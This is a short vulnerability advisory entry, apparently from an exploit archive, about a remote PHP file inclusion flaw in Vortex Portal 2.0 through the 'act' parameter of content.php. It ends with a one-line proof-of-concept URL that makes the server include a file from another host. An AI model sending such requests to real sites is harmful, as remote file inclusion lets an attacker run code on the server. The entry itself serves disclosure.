Vortex Portal 2.0 - content.php?act Remote File Inclusion

2005-03-23T00:00:00
ID EXPLOITPACK:BD7281A5F3FDA30DE169627A0F997F38
Type exploitpack
Reporter Francisco Alisson
Modified 2005-03-23T00:00:00

Description

Vortex Portal 2.0 - content.php?act Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/12878/info
 
Vortex Portal is reportedly affected by a remote PHP file include vulnerability. This issue is due to a failure in the application to properly sanitize user supplied input.
 
It is conjectured this vulnerability affects the latest release of Vortex Portal, version 2.0. 

http://www.example.com/content.php?act=http://www.example.com/file